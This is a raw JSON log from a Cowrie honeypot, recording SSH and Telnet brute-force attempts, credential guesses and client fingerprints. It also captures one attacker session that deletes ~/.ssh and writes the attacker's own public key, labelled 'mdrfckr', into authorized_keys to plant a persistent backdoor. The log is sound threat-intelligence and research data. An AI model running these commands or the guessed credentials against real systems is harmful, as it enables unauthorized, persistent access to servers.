keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:02:38.866098Z","src_ip":"103.12.154.87","session":"8187da426da8"}
{"eventid":"cowrie.login.success","username":"root","password":"xc123456.","message":"login attempt [root/xc123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:02:39.820513Z","src_ip":"103.12.154.87","session":"8187da426da8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:02:40.361241Z","src_ip":"103.12.154.87","session":"8187da426da8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:02:40.362311Z","src_ip":"103.12.154.87","session":"8187da426da8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T07:02:40.363523Z","src_ip":"103.12.154.87","session":"8187da426da8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:40.600231Z","src_ip":"103.12.154.87","session":"8187da426da8"}
{"eventid":"cowrie.session.closed","duration":12.879029512405396,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:40.900686Z","src_ip":"42.87.185.109","session":"75b072b1be1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:02:41.077312Z","src_ip":"103.12.154.87","session":"8187da426da8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T07:02:41.077969Z","src_ip":"103.12.154.87","session":"8187da426da8"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":55481,"dst_ip":"1.2.3.4","dst_port":23,"session":"d355ea58bc1b","protocol":"telnet","message":"New connection: 42.87.185.109:55481 (1.2.3.4:23) [session: d355ea58bc1b]","sensor":"my-vps","timestamp":"2025-08-26T07:02:41.080573Z"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T07:02:41.314569Z","src_ip":"103.12.154.87","session":"8187da426da8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:41.315462Z","src_ip":"103.12.154.87","session":"8187da426da8"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":56652,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ad7a180d28d","protocol":"ssh","message":"New connection: 103.12.154.87:56652 (1.2.3.4:22) [session: 8ad7a180d28d]","sensor":"my-vps","timestamp":"2025-08-26T07:02:42.539047Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:02:42.540761Z","src_ip":"103.12.154.87","session":"8ad7a180d28d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:02:42.980177Z","src_ip":"103.12.154.87","session":"8ad7a180d28d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T07:02:44.470954Z","src_ip":"103.12.154.87","session":"8ad7a180d28d"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:45.695728Z","src_ip":"103.12.154.87","session":"8ad7a180d28d"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":58304,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd23427d0280","protocol":"ssh","message":"New connection: 103.12.154.87:58304 (1.2.3.4:22) [session: fd23427d0280]","sensor":"my-vps","timestamp":"2025-08-26T07:02:45.930874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:02:45.932384Z","src_ip":"103.12.154.87","session":"fd23427d0280"}
{"eventid":"cowrie.session.closed","duration":12.770689249038696,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:47.940982Z","src_ip":"42.87.185.109","session":"dec4b2716542"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":55596,"dst_ip":"1.2.3.4","dst_port":23,"session":"2b50782adeea","protocol":"telnet","message":"New connection: 42.87.185.109:55596 (1.2.3.4:23) [session: 2b50782adeea]","sensor":"my-vps","timestamp":"2025-08-26T07:02:48.121061Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:02:48.181976Z","src_ip":"103.12.154.87","session":"fd23427d0280"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:02:49.073406Z","src_ip":"103.12.154.87","session":"fd23427d0280"}
{"eventid":"cowrie.session.closed","duration":"10.6","message":"Connection lost after 10.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:49.284798Z","src_ip":"103.12.154.87","session":"8187da426da8"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:49.297109Z","src_ip":"103.12.154.87","session":"fd23427d0280"}
{"eventid":"cowrie.session.closed","duration":12.86007285118103,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:49.950221Z","src_ip":"42.87.185.109","session":"cb402536e7f5"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":55669,"dst_ip":"1.2.3.4","dst_port":23,"session":"e26536a1a470","protocol":"telnet","message":"New connection: 42.87.185.109:55669 (1.2.3.4:23) [session: e26536a1a470]","sensor":"my-vps","timestamp":"2025-08-26T07:02:50.158535Z"}
{"eventid":"cowrie.session.closed","duration":12.779035568237305,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:02:53.859354Z","src_ip":"42.87.185.109","session":"d355ea58bc1b"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":55701,"dst_ip":"1.2.3.4","dst_port":23,"session":"40f5218a3016","protocol":"telnet","message":"New connection: 42.87.185.109:55701 (1.2.3.4:23) [session: 40f5218a3016]","sensor":"my-vps","timestamp":"2025-08-26T07:02:54.050442Z"}
{"eventid":"cowrie.session.closed","duration":12.896270275115967,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:03:01.017267Z","src_ip":"42.87.185.109","session":"2b50782adeea"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":55880,"dst_ip":"1.2.3.4","dst_port":23,"session":"b48a6d1c369e","protocol":"telnet","message":"New connection: 42.87.185.109:55880 (1.2.3.4:23) [session: b48a6d1c369e]","sensor":"my-vps","timestamp":"2025-08-26T07:03:01.194354Z"}
{"eventid":"cowrie.session.closed","duration":12.735469818115234,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:03:02.893931Z","src_ip":"42.87.185.109","session":"e26536a1a470"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":55890,"dst_ip":"1.2.3.4","dst_port":23,"session":"93142c1f48f4","protocol":"telnet","message":"New connection: 42.87.185.109:55890 (1.2.3.4:23) [session: 93142c1f48f4]","sensor":"my-vps","timestamp":"2025-08-26T07:03:03.079034Z"}
{"eventid":"cowrie.session.closed","duration":12.84934663772583,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:03:06.899721Z","src_ip":"42.87.185.109","session":"40f5218a3016"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":55926,"dst_ip":"1.2.3.4","dst_port":23,"session":"512e5cfdfc37","protocol":"telnet","message":"New connection: 42.87.185.109:55926 (1.2.3.4:23) [session: 512e5cfdfc37]","sensor":"my-vps","timestamp":"2025-08-26T07:03:07.093824Z"}
{"eventid":"cowrie.session.closed","duration":12.844607830047607,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:03:14.038877Z","src_ip":"42.87.185.109","session":"b48a6d1c369e"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":56105,"dst_ip":"1.2.3.4","dst_port":23,"session":"e2199cb6d3ed","protocol":"telnet","message":"New connection: 42.87.185.109:56105 (1.2.3.4:23) [session: e2199cb6d3ed]","sensor":"my-vps","timestamp":"2025-08-26T07:03:14.233927Z"}
{"eventid":"cowrie.session.closed","duration":12.798895835876465,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:03:15.877864Z","src_ip":"42.87.185.109","session":"93142c1f48f4"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":56118,"dst_ip":"1.2.3.4","dst_port":23,"session":"731bfbbc8b6b","protocol":"telnet","message":"New connection: 42.87.185.109:56118 (1.2.3.4:23) [session: 731bfbbc8b6b]","sensor":"my-vps","timestamp":"2025-08-26T07:03:16.042627Z"}
{"eventid":"cowrie.session.closed","duration":12.805116653442383,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:03:19.898879Z","src_ip":"42.87.185.109","session":"512e5cfdfc37"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":56153,"dst_ip":"1.2.3.4","dst_port":23,"session":"863743246716","protocol":"telnet","message":"New connection: 42.87.185.109:56153 (1.2.3.4:23) [session: 863743246716]","sensor":"my-vps","timestamp":"2025-08-26T07:03:20.100152Z"}
{"eventid":"cowrie.session.closed","duration":12.54885721206665,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:03:26.782707Z","src_ip":"42.87.185.109","session":"e2199cb6d3ed"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":56320,"dst_ip":"1.2.3.4","dst_port":23,"session":"5ec1a0ec26ac","protocol":"telnet","message":"New connection: 42.87.185.109:56320 (1.2.3.4:23) [session: 5ec1a0ec26ac]","sensor":"my-vps","timestamp":"2025-08-26T07:03:26.998953Z"}
{"eventid":"cowrie.session.closed","duration":12.875598907470703,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:03:28.918188Z","src_ip":"42.87.185.109","session":"731bfbbc8b6b"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":56338,"dst_ip":"1.2.3.4","dst_port":23,"session":"2aed8ca2bd86","protocol":"telnet","message":"New connection: 42.87.185.109:56338 (1.2.3.4:23) [session: 2aed8ca2bd86]","sensor":"my-vps","timestamp":"2025-08-26T07:03:29.075479Z"}
{"eventid":"cowrie.session.closed","duration":12.837137460708618,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:03:32.937216Z","src_ip":"42.87.185.109","session":"863743246716"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":56464,"dst_ip":"1.2.3.4","dst_port":23,"session":"18744aad66b5","protocol":"telnet","message":"New connection: 42.87.185.109:56464 (1.2.3.4:23) [session: 18744aad66b5]","sensor":"my-vps","timestamp":"2025-08-26T07:03:33.117622Z"}
{"eventid":"cowrie.session.closed","duration":12.81099009513855,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:03:39.809867Z","src_ip":"42.87.185.109","session":"5ec1a0ec26ac"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":56538,"dst_ip":"1.2.3.4","dst_port":23,"session":"ab647ab98b20","protocol":"telnet","message":"New connection: 42.87.185.109:56538 (1.2.3.4:23) [session: ab647ab98b20]","sensor":"my-vps","timestamp":"2025-08-26T07:03:39.993719Z"}
{"eventid":"cowrie.session.closed","duration":12.787172555923462,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:03:41.862563Z","src_ip":"42.87.185.109","session":"2aed8ca2bd86"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":56563,"dst_ip":"1.2.3.4","dst_port":23,"session":"4ddb5b211059","protocol":"telnet","message":"New connection: 42.87.185.109:56563 (1.2.3.4:23) [session: 4ddb5b211059]","sensor":"my-vps","timestamp":"2025-08-26T07:03:42.101888Z"}
{"eventid":"cowrie.session.closed","duration":12.786452531814575,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:03:45.903975Z","src_ip":"42.87.185.109","session":"18744aad66b5"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":56702,"dst_ip":"1.2.3.4","dst_port":23,"session":"f7c985d0e604","protocol":"telnet","message":"New connection: 42.87.185.109:56702 (1.2.3.4:23) [session: f7c985d0e604]","sensor":"my-vps","timestamp":"2025-08-26T07:03:46.053230Z"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":53708,"dst_ip":"1.2.3.4","dst_port":22,"session":"e94d74adb0b7","protocol":"ssh","message":"New connection: 103.12.154.87:53708 (1.2.3.4:22) [session: e94d74adb0b7]","sensor":"my-vps","timestamp":"2025-08-26T07:03:51.139003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T07:03:51.139745Z","src_ip":"103.12.154.87","session":"e94d74adb0b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T07:03:51.353834Z","src_ip":"103.12.154.87","session":"e94d74adb0b7"}
{"eventid":"cowrie.session.closed","duration":12.892130613327026,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:03:52.885776Z","src_ip":"42.87.185.109","session":"ab647ab98b20"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":56764,"dst_ip":"1.2.3.4","dst_port":23,"session":"06ae633f476f","protocol":"telnet","message":"New connection: 42.87.185.109:56764 (1.2.3.4:23) [session: 06ae633f476f]","sensor":"my-vps","timestamp":"2025-08-26T07:03:53.196955Z"}
{"eventid":"cowrie.login.failed","username":"elsearch","password":"elsearch","message":"login attempt [elsearch/elsearch] failed","sensor":"my-vps","timestamp":"2025-08-26T07:03:53.515743Z","src_ip":"103.12.154.87","session":"e94d74adb0b7"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:03:54.736591Z","src_ip":"103.12.154.87","session":"e94d74adb0b7"}
{"eventid":"cowrie.session.closed","duration":12.825685977935791,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:03:54.927481Z","src_ip":"42.87.185.109","session":"4ddb5b211059"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":56882,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f4043fd637c","protocol":"telnet","message":"New connection: 42.87.185.109:56882 (1.2.3.4:23) [session: 0f4043fd637c]","sensor":"my-vps","timestamp":"2025-08-26T07:03:55.111375Z"}
{"eventid":"cowrie.session.closed","duration":12.920634984970093,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:03:58.972229Z","src_ip":"42.87.185.109","session":"f7c985d0e604"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":56922,"dst_ip":"1.2.3.4","dst_port":23,"session":"d4c83547f567","protocol":"telnet","message":"New connection: 42.87.185.109:56922 (1.2.3.4:23) [session: d4c83547f567]","sensor":"my-vps","timestamp":"2025-08-26T07:03:59.130492Z"}
{"eventid":"cowrie.session.closed","duration":12.721887350082397,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:04:05.918772Z","src_ip":"42.87.185.109","session":"06ae633f476f"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":56971,"dst_ip":"1.2.3.4","dst_port":23,"session":"e160f426d54a","protocol":"telnet","message":"New connection: 42.87.185.109:56971 (1.2.3.4:23) [session: e160f426d54a]","sensor":"my-vps","timestamp":"2025-08-26T07:04:06.093110Z"}
{"eventid":"cowrie.session.closed","duration":12.854527711868286,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:04:07.965828Z","src_ip":"42.87.185.109","session":"0f4043fd637c"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":56990,"dst_ip":"1.2.3.4","dst_port":23,"session":"124d011fcff9","protocol":"telnet","message":"New connection: 42.87.185.109:56990 (1.2.3.4:23) [session: 124d011fcff9]","sensor":"my-vps","timestamp":"2025-08-26T07:04:08.148791Z"}
{"eventid":"cowrie.session.closed","duration":12.781617403030396,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:04:11.912043Z","src_ip":"42.87.185.109","session":"d4c83547f567"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":57108,"dst_ip":"1.2.3.4","dst_port":23,"session":"12881de47198","protocol":"telnet","message":"New connection: 42.87.185.109:57108 (1.2.3.4:23) [session: 12881de47198]","sensor":"my-vps","timestamp":"2025-08-26T07:04:12.070249Z"}
{"eventid":"cowrie.session.closed","duration":12.93562364578247,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:04:19.028672Z","src_ip":"42.87.185.109","session":"e160f426d54a"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":57178,"dst_ip":"1.2.3.4","dst_port":23,"session":"d57ed01df82d","protocol":"telnet","message":"New connection: 42.87.185.109:57178 (1.2.3.4:23) [session: d57ed01df82d]","sensor":"my-vps","timestamp":"2025-08-26T07:04:19.276052Z"}
{"eventid":"cowrie.session.closed","duration":12.893051147460938,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:04:21.041747Z","src_ip":"42.87.185.109","session":"124d011fcff9"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":57263,"dst_ip":"1.2.3.4","dst_port":23,"session":"8ff223ea6ffc","protocol":"telnet","message":"New connection: 42.87.185.109:57263 (1.2.3.4:23) [session: 8ff223ea6ffc]","sensor":"my-vps","timestamp":"2025-08-26T07:04:21.207429Z"}
{"eventid":"cowrie.session.closed","duration":12.841750383377075,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:04:24.911900Z","src_ip":"42.87.185.109","session":"12881de47198"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":57325,"dst_ip":"1.2.3.4","dst_port":23,"session":"4dd04cd43daa","protocol":"telnet","message":"New connection: 42.87.185.109:57325 (1.2.3.4:23) [session: 4dd04cd43daa]","sensor":"my-vps","timestamp":"2025-08-26T07:04:25.137433Z"}
{"eventid":"cowrie.session.closed","duration":12.826056957244873,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:04:32.102023Z","src_ip":"42.87.185.109","session":"d57ed01df82d"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":57446,"dst_ip":"1.2.3.4","dst_port":23,"session":"d5d2a1563a84","protocol":"telnet","message":"New connection: 42.87.185.109:57446 (1.2.3.4:23) [session: d5d2a1563a84]","sensor":"my-vps","timestamp":"2025-08-26T07:04:32.271874Z"}
{"eventid":"cowrie.session.closed","duration":12.61555528640747,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:04:33.822913Z","src_ip":"42.87.185.109","session":"8ff223ea6ffc"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":57517,"dst_ip":"1.2.3.4","dst_port":23,"session":"0e81e28a3173","protocol":"telnet","message":"New connection: 42.87.185.109:57517 (1.2.3.4:23) [session: 0e81e28a3173]","sensor":"my-vps","timestamp":"2025-08-26T07:04:33.984574Z"}
{"eventid":"cowrie.session.closed","duration":12.824871301651001,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:04:37.962238Z","src_ip":"42.87.185.109","session":"4dd04cd43daa"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":57540,"dst_ip":"1.2.3.4","dst_port":23,"session":"8342be578160","protocol":"telnet","message":"New connection: 42.87.185.109:57540 (1.2.3.4:23) [session: 8342be578160]","sensor":"my-vps","timestamp":"2025-08-26T07:04:38.173748Z"}
{"eventid":"cowrie.session.closed","duration":12.659260749816895,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:04:44.931024Z","src_ip":"42.87.185.109","session":"d5d2a1563a84"}
{"eventid":"cowrie.session.connect","src_ip":"42.87.185.109","src_port":57708,"dst_ip":"1.2.3.4","dst_port":23,"session":"82857d1906b4","protocol":"telnet","message":"New connection: 42.87.185.109:57708 (1.2.3.4:23) [session: 82857d1906b4]","sensor":"my-vps","timestamp":"2025-08-26T07:04:45.144874Z"}
